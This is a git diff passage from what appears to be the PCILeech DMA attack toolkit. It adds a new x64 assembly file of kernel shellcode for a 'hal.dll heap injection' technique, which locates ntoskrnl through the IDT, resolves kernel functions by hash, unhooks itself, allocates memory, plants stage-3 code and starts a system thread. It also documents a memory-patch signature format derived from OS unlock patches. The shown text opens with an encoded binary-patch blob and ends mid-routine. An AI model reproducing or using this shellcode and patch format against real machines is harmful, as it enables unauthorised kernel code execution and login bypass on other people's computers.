zBID<O#}w-R(FnNt*Lm_h3oo!gU!LcFi7tre>-~smp670YE`jG8Y1MT}JdeY=`e)&J
z)iY%WB#|SyQ>e@2`6j$VHqU$Wd=AeeYNY;6<#`{T&*OPS7}dW8Jnzf%MLgeB%|p&s
zas-~0s(-6_9>Em#Z!OQ`@w583f#*#;zlrDBqbc^ch3DCoX7;y(=bLL;T{+JOvpkdY
zDvoHu2~P5SOP;^L^C3K6&GVr=ukd^;p0DG1GtWQZ`7oZ>J=T^y9C_BhZZj8(2u|S1
z2_kvkm*=B+K8WXA^Sqho+wgoe&$s3I1fFll^GQ4(!`s(cIHEl#5P2RC@YKIdo{#7G
zY@YAJ^Eo`<mFK7OJTAVde|bEg%<~I){uyojaJM<4Cns3R^A?_8&GV@|zn15F^ZW*$
zPviMbJl}`sxA1&lp5MXqR(1Y?Ea!-RoS=&5`}6!so*%&T7kGXk&sXz&CeJH8|Npgj
z_R&$5cOHN4B`=c~U<d&w;cdWxqtZCVh@+s6Ks6}h2oY0!>4-sNL3f1MjtEXf)TpQd
zu`?>Q6R<jYagzE{va5Bcmg=aWqs2C@R0pMPT#?S%vfb2U?S6mv`Cge=_w3nocK_PV
zIX}L?&+mD?&vW1Axy+sA<Qy6QGsXHFB1cv*p#G+JidAF>+3ui|Z16<jBAa9nc?8)<
zE+FHCW1Z3p$@MxtqKX)3WPxIGGuc57lkqkV>ksERtHLsJ8`I0lG4e=qf;@`cZ!tE{
z{>YVP1}8HNkjIeiQ)va+K9!Co4>Erxd5AoY>`?lX(s;5<ScccdfQK2X$Ubs4xt=_c
z+(@28ZYEDAhsjgOZRDxs7}&bbxfw_>!!&X~c{({wK8`#<t|1SSXOM@;Gs*bR>eiGU
zPj(rmzAZn20S_~rNcNFWBG;2=ksHZhBjf9-Rs$!KTgkJ@?c_Rg+=%D`r!vsT40FgS
z@@eD@*+<TjPbcTdXONYt>z_+@lFuT$BMh9)fS2qi`^o2!1LOtdAbBA<O#TMBjeIUS
zMm~=mNieX8fqwG&<TUvL@&I`;d62w>JVd^T>=>a(AV7AJmuikE4+G1Y!AHK7Tu)v>
zZX~ZFH<MSB!{jyOHu7!c7}>DyNO1fm7%1Q^ihZk8OzvlT2{}!cH&e;q0J)qzNS1do
z$=?upEZI?@N2F3%AOAWqo*6vMAaAddKOcEAIY6F84wC1R!(@DQ#`<d`FCfRrtHIK~
z>SMs*JywcbK+ceh$yss<IY%xft3tg&<zy$hn(QXeE$8*u$G~c4s3#k|X=@}GkekWH
z<S@B}+(s@X$H?+lYWYi$tDV;N;~tHHxy+Cz8@%ZoAQzAa$;IR$atYZ{q(`8X>>`(w
zJ>=>L13m`kk^^LecacGI2{}YACAX5x$?fE7a-2Mu+)s`eyvs~8P(mIcmy!p`)#M@a
zT(YxRZ?WN)0anUQE^%9^yyQ}{UvoswWguWzP@@Y3?Fz^ty8?16c`mu#F7MIh<92y+
zpIx4uvKaGk%+duib^&tME<nza4X@6x9D0jO$WC%8*-bX;bbha$pX?Ww{jZdPfL*|+
z3k1of<dB^{Pp7xq>Ew1h-LKQ*b~?Gw=7l;v1zuvnFRj;sjGbYz=B&*D%{g+x2F<EO
zk3coqS+e^zuQ{_kV&5#zXTBisHaU_iI6)V@k?D$`P;3k_eSm>h@^8rP<R6ja<hbUD
z>SN#mW=N6WBxlI)khA2s$vJW-S-EtF|B>t@?;*R%2Q0><dKp;241V%na)A8L<RCds
zuIGr^AE81_f0XHM<ke&c^G_3&ohr@@SKApl#4_LV*T;133o1q4sFPKOyqoM~d6PWI
z^ly+oOfLXS`)Y_8&SM5gl^(*o$X*sGB)gbiPxdjri0ondPCK2vm0V9=#P(Gq1J5u+
zGr61W;QjeI<S^6kCHvWdVsabP?T={nOm{Fn#`ImhsHp@4`<S7h+(S;2UnLKaw~+_Q
z|3n@l|D5co)+72X*+u@PHU0>C7|1Y#k9+~So}3~#lJOtVtiJ%au!P*q^tZ@iGXAHE
z_18v@{EC4X1Fw-2<mbr!<e!q$<o)CU^5f(|@>Ap?^7~}RL~BGM>OlrvI-s&-5BYhr
zkNgI?o_vtpNPd^xOn#3XCjXk;W--S9Wd>Y4E{`L}SYQ=7z;t_QB*FAGO!qQ<Cb^&K
z&E!T-Q7Jhs=`#O|83?fgd=<j_8(;<N$U#<6MjmAPcJdJUhh)bjz0)PhF7kzB57_!p
z`C|rr%<ux)UWqu1T+j42vb{8N8o80__D<c*4wo~%nd$b*NceL;>#-M$!pzXZ0%=y@
zBDXQUmmDLnAcvTLBsszKi^zVCu!r0~DWZqy+YBgXm`YBwf~&}3HZY1jz;s@9RV&j+
zGkuWh50Qt+7n9o}EZ}6oF<EzLDY=;)`Wo5A^tE;cO#eFB!}KsY!}K%AKBjLXN7~te
zF$~zNO=pwqS>SGRBY7FQoej(;H#7ZavWMw2$YG{mt2v_F%uvG&ZOm{DIYz#p+{pYV
zkrPb6p4?Bqojl0=XOh!Qztdvussqe0ml+0_VKcdv>0a_6)4xw1B7c|cn4+ifCbEls
z2|30QuMkH23P1L2ErooK8GPghay>apj<bTX<VL37NA6>X?IqV{rr*l+1j|=~rF|7<
z273jvj~T|XKpWF9CCA7ya)P{t+)w@iIZaO3>8yXeef=L`hDK&cF~bD%Ak)7|&T<Rq
zk%yRm2iY-IkLZ(R7x_D64|#`u{m-z$DrWF8!)0VA8=OwAXL=L4k^CaLnfx<ynA}Hh
zBlkxbh%xXwIYEAfJircCllz%|IoVmFxA;SHn&~f*v*e$Uhscp9><Zkvf`{z_Y;Ypk
z!}LeUKJpdh7)R(7ay`@6lkG)oKe<t-N7OwGq*#HE+^jRGR&tu@r<21>zl}V|4o@Pt
zG5tz%jC=z*XXTG5HJO0~GknWtHh3zzpXnRO_M;d#InDHy<RNxw3VDF(L2_K`NBjCW
zlc0lcJq3?3gPNxK7P5~WI-cxe`gLRv`5)~3<Pqe0@(1Kbu=Sy`oq=X%=pcv5Pm|lo
zUE~<~TykRC?&%kp(@!3M)(0``Tp`!tjEOVcd8YE59$m5C{MLw&ssHm_dGL1qRG=9u
z|M6~Iw0*kikO7hZB_3aGsM?lQ;g*`~tr?5oVkkF~>{yN0t5S%0QN51glGkdeAhx#l
zx~8jIuBx#n4y{Oas@Chh`WjqxLSTpRf~5^LjSJ3!tHOD)hy*3tnioWDg=B0S7F%Q$
zZvRqDg0U~f79bW!%mvjAFOrbzAD&Ozh^W-CV8Ci5jhM9+R<8rrd2(QQzDCKI9Uikf
zJvc1ZVAYo!R$qgaPi;1o=VuuI+O;x#de&t2G}o+OzrJZDMo<kcGW8IyZMnK;(K%Ly
z>iqoJ3adg#eyl;~a}JB?d@jU7xE9og(QX6{w*^gw*|g_T-&$N{>fzIKYn^6Xh~>?9
z9f~OVzrhulVD1BRB&I^hhfhYedb?B*Z^G!u4NvXLb?dD3c2l{f1EHp?7RZ*XKGQny
z)LwhdbxrGPq%W!!F*lU4n<b`Fs2EbacHP>mYrNJ?STJQqcW*SWiqv4UrWKm1a8J3K
zkI9oazt>3&1-{HOxe}8yRa1)8=%#Wtx~@!(URxIOuEn}C${3{uSbr)~rL&7dRW-$`
zqG`6OsQbFAFltp<2<sTg7c`WrnpmXDw>hGZ-fEVdD8YIZp60;(v{WdCOX_l1iXAz|
z(Kl{2$6sUTuNr5nqHU)43!Yr4$_%$E2#pAuUfo#MuD4;Ta^tkS8s@n`Z(u%Gxe8Uu
zrovD`a6~|tjh-Jdr$>SqiN|3ZtTF{k9mO0Sa;V{PY*b#ps<DPD*s0t1qy4H01<J8a
z_e%O|#iZ|Rb>C&+tUOQa)+J9PVi=E;^?*!O>IIlutUIpqxN71ERc?$|g*j<3I=j`J
zepaqVsWRNm`Xs*$>LI7amm#*8bx3+XA1f2xhB`{~_{CQ9jHv%Mv+`W&S)25%wm{V$
ztx%5rlU3_kN_`G1zfgB>ILnA(Mu+8#K60BmB_egXo!D|bk1T(?Fo!t{NGu@r<00zk
zmXXR)SD^xDD%AzsBK6CzdZ^su0mR~LQ_}N!SQ%A>8N<gr)TfTsH^Hi~YFeQhjYV-s
zwkTDAmN9}$HlcIv^OdT^>Cdr5Z`5$cr{klzG2M@Q&lVh#P1slKCaL^9#%MV{95_CT
z)#%w}A*<sJMJj#{UJDNkTlM0+^>;CB)HyhFF;n!-P3Bbp{?ugSwUjeADqEf@O*ulv
z!6K`#*p={$kX3Wa)Qq}cre+v>zcNptC|Y~FInx^OkPNQu5&NAg_YI|%;j-wxNN?kC
zM&G`i2hU+=w2V=XrfT&P%6$Y2vFvchq$8gio-e4XW)!NiMrlz|wjgD418{{@(}Fmj
zn#L5(IO-@G*HTjCsB;$eEy7*}+rtL(*{Y{*R0Zm)D8d%WUgK}aR~0v#lOx9FGPM~a
zzoE{lT$?I$6<KFyRH{5wh6bzfXnSPcST*uri>xyi%BrfFMXJ(xCsmv&OyRn3olN9s
zH>aKFQ0E<eJ2m&vFH+v7{V7Mofm9rIlw6Fh4(Jif=c*IR)P%ap(FZo0<E){U<3tWl
zyueD?XQL2CwQ71X8gwg14&xA#y<TrY7Wt=5EmBkWPf^Z2Q?c*QRH0=!B{$&R{cJFw
z_33pfPOkx+UY8s@y_zaI`VMwN4lrxJ8%CMIHE02!KpQSb@2yj9ktuv9EF>``f0>7s
zQ8KS6^X0mf?8n3FuR6Iby6X<J%ESTn;vM)(z06U_F!YHZQ&9f2-i_@ez6$?Kp|q}C
zm9CYkiB7rG9B+*x?v`|C>&{T|tCczkYgmfT;sP@9=xjB%<rM6YbFKI%NLwRm(ov)-
zq)Gl`adh<WVmRRP>NRj(u4ovAQ5_k5=1#NXV%*q002{FC#eO!7QQy(>VKD=bVJorw
zRW@LjaUran?F>~-7@-_13$kWVW;#0ME_1@Exc{vU;S9Y@k9&3)<Al`$YmgIGnL3sh
z{q|jE?fAyKaGk|et!Yte(@nTc;tq4uP0{3C=Ik%h{u!74^Vci&9@5TVAN})PW;FUx
zn^}Lnb$uSGO1Ih9=bhNp4(vdWeX#>&F?vz|-KI+>Z^hl_6u%*--8w^!k<&6ZO3r9@
zFOIb1W()Rbv?PB9o=cByC{<(YO4Qidqq8GJ<-zC<)HYS$GmJtFBh~0_`kuirB?@r4
zoUfv<+-;sIO%~l_9yf7vxtiQkrY1L)s>ux{YI2=JO`ctqn~)usihAxb7q2w1BNojz
zy;W7Es_IaQs%mkls-|L9h5l8|9+#8;VS3a$d|G`AHU=+sbM95@QuyPcv*aaj_#30^
z`C@xcctfePVV`b@zHyH^{Th2a$GwT4-hd_Ta+6Bcq^8koQr##uX{{?aK3kcoNIAc#
z=St*#I)m?2GJgsCYu7ilA3yK+j-JWFccNF`YgWs~ufNw^TVdz<aaO5Q4=S~CL-cc`
z&$qYf&JXZ9FW4=tdlCHKz#g*u_NBJY`khjjzz%MRuGnIpH$et`C7K>rq{cNl)i`Xz
zxTnX2qM0q`q=?=49Ur4Y*cTi86_bA^(wF@gd4BsZN{#$4^86g>ztDN2tM4<vCL{64
zedhh5C*E%^U8zqWm@RAnEw=72?T)U**HKfjG`GHLMyVR#Fh-5X6=3|@ikvfRo&SSU
zhjpuUQn9LTIjXAb{-mmnoRTX8+IjDObNUw}Ke^CQGhxXM(TWGm<;UA?4URX|srW|f
zLAGU#GS#TrrCy`dls-l8dcgd;b(e%X*;#!vY*+BQ8--z?{wGs)!*Pb%3>&*K`uPLq
z^f`99vu7CU^qGb_VIz0jub7P_%I$%n(^s~eC!TAU-R3dW4%me(%R?t%IPftO`@vTo
z)^8#ItP>2iYGd@pc5})X10!$znC>-HWMlM5yE#WDXy#UPis-ppO}wLVZS>n)&9g+i
z7=LZ6SzGP*8LIPiL*=f}C%j`Et=Oi^&Dmy7sdhIQ>K53-D|NnO9K8YgCI;|=rE6jB
zOwZ%!^V`g6Q@(0rZo14+c&*9bZOk99Fq9iF(89*de$ZShoxbxybISSlz<q$%-F*!E
z9tKX-kgMjl0<XTi!<`+^g;g_4l&g6ZF6&cNNwzpt6fE@eZt}ec%_UzPQk%kfA16%e
z6D`U6v}Ct=#m(3_SO$4St+V5F`F5Krrz`94@G4XJTJcdmFLuT?NJq@c@107<1Y$#*
zjJfzZj$?&u@nu7KS*S0s@EXM2DD2NGT+od5klUlO=&{vX`2XMh{r_+N{$Kv)ul2LU
z{~O=@jV_Iu>FB(N&3V!4ht27`!w;Jw$B%cKSz|=tBP06ZF7w<G>-2IYj>F=D`u`^2
zTfP$t+QVGXtjv6@7c>K(Xw4kt!Y1-f9h1G$^vm@nfJQ_YJUDH{RlB=>XufF}>vpey
z(ws0Na<fkAyXSvKBmA4idY@&z|Cv_&eL{44xA}W(DQmv-*b<g3W#wRtv5F*m7Cw;%
z;fpSUh2RIE<1299gfB0*dzF3`ddgV*S8Bxl(AQuw_!;QuupP^BKCQ&Byul=%s>GV;
zBrFAdCKW;7gt@R}l!5*gW);X=){^C|r7nD|Kz`8{*kSms(7#q;$qBxy#tID{ZRAi-
z5IPl0R|nwdFI&lS))Fk<`!B#()5W<C)__bQ=pI-NK49c87s)cxA~!mZWgyWjVIKHF
z=n>dnl+8hxP19wAP<#DL^j+8%<PjY+9cl1I-4Xor0>BL&dmKLe!w*15)#xp7LO-B?
zY;DOLwk{>>QDrA$G|(Z@D`0K#MK{7?@I~*2CE&M1-+;;JM$}14y$##@EmLKo883zx
z%PgWNo`$J`?}a|<!^#E<$Dz^F@$m`qIP|kK&{4$IT&3QJNjwW(fVHJ&tTW}WDdn#>
z$-2`i^39KaWP+pou)Xj_FM%C^FM2ENF#P-lGFdpAe-5SqanY49KYY<0umJox)Lt_Z
zoiQJyg3gJCVLRZ5=ST2^mw-M%JJeph5*=8mlpAr;e}gTAFM0tMfEwTjphsXba`}ru
zvN-fZ*kY`~h{_^Q5Wc9r_#=9KJ%05sf&_75upRJ4yI?)=MW2UB;S@B1g`ILNY2+{J
z$YRg$FTiLakLZZSm=gF-=q<3lmtf?e`(biKWTE#h!DykLc4*|*i?GK6TA_0S_`V^0
zKlBGMH!8|stdT{W3zuOSkw<hjECD}%eMQz?&Tm9Vu{0vO3g&?yg6<VVhcZy#H!VM+
z{BRD#4xpkOwB<59Jb~W|t-TT%QP>Ne6V!*6A9}$`?FXPgh550}kbz!&wT|a6P2?|S
z$dbl)n{eVne$fL>nExGs1AtAdaAtxp`U6-RejNHR9*j7|hhDN8i=yaI5Gsp2a-PUv
z?8#pUk_DpD8!*SnFIoYM!56KACE(XZ;P_zu0MU7{4E+2B6In?41MDz5A^Isyp<&S(
z|Dco;zUaF!i62|}Fs;>+*F)GD5f{zEnk5hP5G)b~h%?B99Q5fMF=uE@KKfk<lQ|1O
zJ7L?AKLtGqi^EszFzm1de7s!)>(3ZboLKON4dsSOS<%z!&x1aL<(EF>fA%IE|1Se1
zQyTgiObUzc`wn`GOd05hFv)WW8u=~`O~hNFpTGv;=b%@Gv8n{W3Hp7Q<c~u?f=Qi+
zq0iln4Qs#?BIw0f=TQwf|2M!1!z7dFF8Yr{|3v>NwComLX*skXR)>lPp(8fvxCeUu
zM(m7;hoF04(uw`h@>^LJx?FsmGa8{gBZMC4+E$#oP`Dj>>1~)NsR-)49hY7BZs;Xg
zp9#a4&ppfT#se1k4bVGb(pVcbK|cjO1dAb04(hlEQwHA&9RqtDe#8xD8Y}^*fi8ea
zMGK*~)87nzf_?&e1SX@EgC2jc_C3(t7VM;#A`V@69~#Ex*i!m2=-*(n_3C~ciuYsw
z<q+BfFdx8K51qg(S=4#$IBd`WUb>=o!=$kcbmUfCA<;P}^to*~{NVRPn;z7M;&$lC
z+i?;@+zZ`HUo`L#I)%7sH%#*MJcQ%l^F3|>v>ztD7JVX$Aw#AFbX-iwUC>8iZHVuH
zc0YnGMyGqAFYeHtNI_5jzOK^?eVo4NoX2$B2i*tT8$m@GI2XkAurG$b(xLq{^qj|0
z0C^TdfAWO(Q_!=YL>>&IAG)FwM-Do1IdoK)?x+*m+pQbxgWlVt^KXGpdP@7Ek%WM3
zC3IsFXF&L^&`Wx?-w3_14;K(L5P+8c2zx%JqZ}HAJ&Sk@dh}`B$iNr<<}<qC81#LZ
z)Srbu_$=yyza9D~7^XF%);xz^^kW#MVdyi@YyVm3hp<D4AA*j3LHm`^1@sp}7ySg&
zgbpo+ZiY!?qQ89+_mYTbp_!ESMXz{CPg4x~+m|r^GT)A$;dtGnw@h@#&-E5~ppU(b
zGZ`w1Lw^U8opBJ_@QN-gdSMzn6ygEsR#*W3cIdUQ;(`Xh8M+B(bq@L%{X_&#mLO`p
zrZbg8H^Jm6*bJ3dNy>a5fY$HDPKCJWR+w~XJ5=q{9jb$dVOC?%pVG%GB-BUr@p>b5
z5iD{Dg#&Q@5hfMwf&LLDg@>T0yotLa9Mg5sUu1Bxg1;Y{d|QuJ3i>Im9PxR-K!;%k
z@bR_@^*l`K!5b(PUZ7$5qSN;4w(zEki25hOA!yk<IP0NsIdl;$b{Xas+69x&^+1hZ
z>WT`WH^U^p0s5<7;jl#6EcC7coY3I6L7#x7@i{aBJpz*s`F@QvCM<@B)v66n0wxKf
zY5Jng@9Hy}=%ojchDsZuPr+or>4O&jR{IX<74(D9G)$&U)c>B|=|oR{U)SS>J`}+}
zk_qn<QE$RhXdnZ<B#Zq*8iPIzldaqVU2+h6JGLeOeFbJU03G{*&f|s_e28^=<Plv6
zld_^GAHoPB?uDN8JM2U7BY4k<x)#<9z`I6N0w!A~I_dX#;}BLJMX!TNd=0eg4>(gI
ze-HFmFd4Z4sQV+mWgckHzhKTK4>SdnDG;6dvE2LNVg_CHG3LJ#&<uDImP4il^mnk!
z5g&v;cNimqct3OiCi{fwzE5!NM?3>P?TGH254xAW=;}Y}5yIP5)DOj%DTcmAfA1e7
z_}~bTAyPS|z7Dg78v2(%;RX?%_ze2$QEUPHz0fEBjJp^3325%$@fZib=<$ESrFsP}
zV9;-Wih2-V1AXc<+;GD0gZ>gGopAgWBL|B`Fr));#(b`?ewEM#Fv+wKy6kV*aZqV9
z^hP`g^uup~ZZ-|o2w&8T2NNyuMgJXUeR#zxybo4@(GtC=*s%7M0CXQrrZoeN1hJZJ
z-Ni!Zml|pS6)lARrOZ%A;p06s>Nq?mkPg*AKZI>Z{1Eis(T3`WzXfVI4eQ+Qf=(P`
zSfertT2g5!4?0l}{WHuDA1}vI^)QTdMBxoN>QN1<A9^946-b8y&^W9C1w`e=mQCVA
zSGWvo@4X!Q7EC&~ANpPuwhVc)(8YN1sCE8;?u5ya@;J0-BI-pR(JS!aTlE1BPd3!b
zsk-4U(3fCR_%L+4TQ?wDFbyMwxab;~91$(hlIglEUh|_oFzHYoG|jl^1UzGqPPm~#
zn3N4h;B1F|hDt?$4GUb3^E|Y)#!!>s&w~CO4>4-sr=brVkNJk*4t)tGjqQP+hldYR
zX+88uur0{*EYyz&5-IqiZ^8QE?}r{Z3G+V-JAya|XJN?TAA+h{?TfBG8C!~Y3p9u)
z7>7_;^qf-+Rf+gQ=<P7sp*BO`pJS*5{4Df4r=dge!_d=w)_kjDPcTe*vJp`S=3(_6
zk0nG$or$f4?}XkGz-m4UZ-9=tSPxwR)Uni1b;u){gUOJJUbIY)MBbwf>ygLA2Fy3|
zi%x>Q0RPzIk%(zMH#zN6LtTyp(FRy6e9@VWdPqIcmtnHblYw6IP58)z_Xetn_?Uti
zG`0f!2jZe{!K@t<x*U&DWNI3rufh%^&tB;Dc=@|EA0g<8SLjS3Xb{g=oY*qazrbWG
z%fE$ZF);a5B)`@ZhsnuG^e}zVc|jdlR~f4N8q7b+_CQBotK*H(1WY;?5oc2~<{Ozd
zL&vW%R0zHc+5ro~e;oQg%oW7ELKS{uNeYWjpzng7K;H*#gGuK^e?#AU14c1~9UgV!
zN37M?Zp8fW0eEl3kBPx#D-T1*uEX9bacCU&8GO+c%({?3m$%?>M2AAqR+tlh3i=0_
zbaW7U<hzD)!_PsdgmtIg&@*AuIe$2U9Rg5?Orq~H;Q;g#m~3U>W<z}+b~*B7prda=
zgYccuN9f~~lj><$5O=`x9}DC^5cJ_l5tT>$Zp209ak|7s<xzTH1R#z)@0JA7mGnjB
zS+&GP<vF$ZqVjlId{KFVE54{aVHICg9+rwPI(DP>Mde|r#6=g#(@g=<RrEz8^hM>t
zo8%FFiM~8&%V~f2#V?t?23EpnNAS)u>&{Q^_{7H@o~3dX5tds}xyz8d4!ID^g&D6v
zv(A}v?v#sxTpc8@nB4xzt&!X{%AKWrIFt{Cax>6?OQPJy$}uQ=C3cqGkv-;X2L79r
z+8D(XxUsu~FPj}kq!kmOuwb*Rc~^K>`>xoo_^!mRzFp~EnOy_BkdQ)ykk+pDu2@&1
ztFJ57mF^no%68?thPoWx&Te<Nr`y-<?+$dg_r!YQJ&B&ap8lTPQ$tUwq$BA}x{~gs
zC+SW4lKy0UGLURc29wRnP%@lsO|~WHwI^fAcruafOZF#I$#gQ497tx9gUMWSD5-iK
zz0O`&ue;aN>+SXR`g`kp1HFyC!QSTHP;a<5+W4wDEt0|Y4n0(HN8A~A#ocjF+#C1B
z{qg#EAl?`c#+&1zcsSk~Z;Q9bWAS)A5$}ul$5ZiiJQE*?XXAtMTzn|5IvgE=&R}P#
zGu+wQ+1A<K8S9L9COZ2&Q=RF~Oy@vnwsWvE*XihTb-BAdUEVHVS6_F3_pDTRx;xW7
z(4Flb?9O!$b*mmnkF&?s<L>eFczb+3{+{|CmBnwyp^wp~w7ER`LfULB=14^My>8Ab
z%;BtKL_dGsoOId%`ZE-FbhtV^9lnnGj>eAWj&Mg?N30{!(ch8o80Z-680v8BbnW!)
z^zE$Q*|@WLXLx7Z?(<$VFOoM#;4&o*CH9%~eO_x`g59C+*6#N1cz0iS3SG^jn+jcY
zqkI0IKu@qI)YID2j=AgWN%drUvOUr2z2?=0PJCij(M@~JBNfVzV;a>CKB1m;JP9YX
N`}2LKX>Rov{0DZ{%C-Oi

diff --git a/pcileech_files/signature_info.txt b/pcileech_files/signature_info.txt
index 79ebf30..8382014 100644
--- a/pcileech_files/signature_info.txt
+++ b/pcileech_files/signature_info.txt
@@ -1,5 +1,5 @@
-Signature Guide for OS unlock signatures and Kernel Module Inserts
-==================================================================
+Signature Guide for Search/Patch signatures and Kernel Module signatures
+========================================================================
 
 
 
@@ -25,24 +25,39 @@ chunk[2] = offset 1aab00 and data loaded from file.
 
 
 
-UNLOCK OS SIGNATURE FORMAT
-==========================
-An operating system unlock signature file have the extension '.sig'. A file may
-contain multiple unlock signatures.  An unlock signature consists exactly three
-(3) chunks. Each offset is a page offset ranging between 0-fff. Pleae note that
-unlock signatures may be used to patch any code - just not OS login code.
+MEMORY PATCH SIGNATURE FORMAT
+=============================
+A memory patch signature file have the extension '.sig'.     A file may contain
+multiple memory patch signatures.     A memory patch signature consists exactly
+three (3) chunks. Memory patch signatures support wildcard and relative offsets
+in addition to the standard in-page offset.
 chunk[0] = search pattern 'data' at 'offset' distance from page base.
 chunk[1] = search pattern 'data' at 'offset' distance from page base.
            only searched in same page as chunk[0] if match is made in chunk[0].
            optional. if not used specify data: '-'
 chunk[2] = replace contents with 'data' at distance 'offset' from page base.
 
+MEMORY PATCH SIGNATURES - WILDCARD AND RELATIVE OFFSETS
+=======================================================
+- Memory patch signatures support in-page fixed offsets in all signature chunks
+  Examples: 0 ; e0 ; ee0.
+- Wildcard offsets are supported in signature chunk 0 and 1, but not in chunk 2
+  which is chunk containing patch data. A wildcard offset is denoted by '*'.
+  Example: *
+- Relative offsets are supported only in signature chunk 1 and 2.  The relative
+  offset is not supported in signature chunk 0. Relative offsets are calculated
+  from the offset in chunk 0.  Relative offsets can be combined with a wildcard
+  offset in chunk 0.   A relative offset is given by r and then the offset as a
+  32-bit DWORD in hex.
+  Examples: r0 ; r1F0 ; rFFFFFFF0 (negative offset of 0x10)
+
 
 
 KERNEL MODULE SIGNATURE FORMAT #1 - memory search
 =================================================
 The default format for kernel signatures is the memory search format.   This is
 used by PCILeech to search the memory for a signature, which is then patched.
+Note that only fixed in-page offsets are supported in kernel module signatures.
 chunk[0] = search pattern 'data' at 'offset' distance from page base. 
            This page contains the function to be overwritten by stage #1 code.
 chunk[1] = search pattern 'data' at 'offset' distance from page base.
@@ -56,7 +71,8 @@ chunk[4] = <offset not in use>, and stage #3 code.
 KERNEL MODULE SIGNATURE FORMAT #2 - page table hijack
 =====================================================
 The page table hijack format is used when a page table needs to be hijacked in
-order to gain execution (if the targeted executable memory is above 4GB)
+order to gain execution (if the targeted executable memory is above 4GB). Note
+that only fixed in-page offsets are supported in kernel module signatures.
 chunk[0] = <offset not in use>, 4096-bytes of original page bytes for page in
            which stage #1 code should be placed.           
 chunk[1] = <offset not in use>, 4096-bytes of original page bytes for page in
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj b/pcileech_shellcode/pcileech_shellcode.vcxproj
index 59d589f..4048de1 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj
@@ -86,6 +86,7 @@
     <None Include="wx64_psblue.asm" />
     <None Include="wx64_stage1.asm" />
     <None Include="wx64_stage2.asm" />
+    <None Include="wx64_stage2_hal.asm" />
     <None Include="wx64_stage3.asm" />
     <None Include="wx64_stage3_pre.asm" />
   </ItemGroup>
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
index ecf6134..a7941bb 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
@@ -149,6 +149,9 @@
     <None Include="wx64_psblue.asm">
       <Filter>Source Files\exec</Filter>
     </None>
+    <None Include="wx64_stage2_hal.asm">
+      <Filter>Source Files\kmd_core</Filter>
+    </None>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="ax64_common.h">
diff --git a/pcileech_shellcode/wx64_stage2_hal.asm b/pcileech_shellcode/wx64_stage2_hal.asm
new file mode 100644
index 0000000..3a2a50e
--- /dev/null
+++ b/pcileech_shellcode/wx64_stage2_hal.asm
@@ -0,0 +1,244 @@
+; wx64_stage2.asm : assembly modified for the hal.dll heap injection technique.
+;
+; (c) Ulf Frisk, 2016
+; Author: Ulf Frisk, pcileech@frizk.net
+;
+
+.CODE
+
+main PROC
+	; ----------------------------------------------------
+	; INITIAL OP AND VARIABLE MEMORY LOCATIONS
+	; ----------------------------------------------------
+	JMP main_start 
+	data_cmpxchg_flag		db 00h
+	data_filler				db 00h
+	data_phys_addr_alloc	dd 00000000h						; 4 bytes offset (4 bytes long)
+	data_orig_fnptr			dq 0000000000000000h				; 8 bytes offset (8 bytes long)
+	data_orig_fnptraddr		dq 0000000000000000h				; 16 bytes offset (8 bytes long)
+	; ----------------------------------------------------
+	; SAVE ORIGINAL PARAMETERS
+	; ----------------------------------------------------
+	main_start:
+	PUSH rcx
+	PUSH rdx
+	PUSH r8
+	PUSH r9
+	PUSH rbx
+	PUSH rsi
+	PUSH rdi
+	PUSH r10
+	PUSH r11
+	PUSH r12
+	PUSH r13
+	; ----------------------------------------------------
+	; r12 = ntos base address
+	; r13 = memory address of allocated buffer
+	; ----------------------------------------------------
+	; SET UP STACK AND PARAMETERS
+	; param0 = address of NTOS code. First entry of
+	; IDT table = division by zero points into NTOSKRNL
+	; ----------------------------------------------------
+	SUB rsp, 020h
+	SIDT [rsp]
+	MOV rcx, [rsp+2]       
+	MOV rcx, [rcx+4]                ; param0
+	; ----------------------------------------------------
+	; FETCH NTOS BASE ADDRESS
+	; ----------------------------------------------------
+	CALL PEGetModuleFromAddress_ScanBack
+	MOV r12, rax
+	; ----------------------------------------------------
+	; CHECK CURRENT IRQL - ONLY IRQL PASSIVE (0) ALLOWED
+	; ----------------------------------------------------
+	MOV rcx, r12
+	MOV edx, 4d90adceh			; H_KeGetCurrentIrql
+	CALL PEGetProcAddressH
+	CALL rax
+	TEST rax, rax
+	JNZ skipcall
+	; ----------------------------------------------------
+	; ENSURE ATOMICITY IN THREADED ENVIRONMENTS
+	; ----------------------------------------------------
+	MOV al, 00h
+	MOV dl, 01h
+	LOCK CMPXCHG [data_cmpxchg_flag], dl
+	JNE skipcall
+	; ----------------------------------------------------
+	; REMOVE HOOK
+	; ----------------------------------------------------
+	MOV rax, [data_orig_fnptraddr]
+	MOV rcx, [data_orig_fnptr]
+	MOV [rax], rcx
+	; ----------------------------------------------------
+	; ALLOCATE 0x2000 CONTIGUOUS MEMORY BELOW 0x7fffffff
+	; ----------------------------------------------------
+	MOV [data_filler], 0dh		; DEBUG
+	MOV rcx, r12
+	MOV edx, 9f361ebch			; H_MmAllocateContiguousMemory
+	CALL PEGetProcAddressH
+	MOV rcx, 2000h
+	MOV rdx, 7fffffffh	
+	CALL rax
+	MOV r13, rax
+	; ----------------------------------------------------
+	; ZERO ALLOCATED MEMORY
+	; ----------------------------------------------------
+	XOR rax, rax
+	MOV ecx, 400h
+	clear_loop:
+	DEC ecx
+	MOV [r13+rcx*8], rax
+	JNZ clear_loop
+	; ----------------------------------------------------
+	; SET UP INITIAL STAGE3 SHELLCODE AND DATA
+	; ----------------------------------------------------
+	MOV [r13+8], r12
+	MOV rax, 048FFFFFFF1058D48h
+	MOV [r13+1000h], rax
+	MOV rax, 0F07400F88348008Bh
+	MOV [r13+1008h], rax
+	; ----------------------------------------------------
+	; CREATE THREAD
+	; ----------------------------------------------------
+	MOV [data_filler], 0bh		; DEBUG
+	PUSH 0						; maintain stack alignment
+	PUSH r13
+	MOV eax, 1000h
+	ADD rax, r13
+	PUSH rax
+	PUSH 0
+	SUB rsp, 020h
+	MOV rcx, r12
+	MOV edx, 94a06b02h			; H_PsCreateSystemThread
+	CALL PEGetProcAddressH
+	MOV rcx, r13
+	MOV rdx, 1fffffh
+	XOR r8, r8
+	XOR r9, r9
+	CALL rax
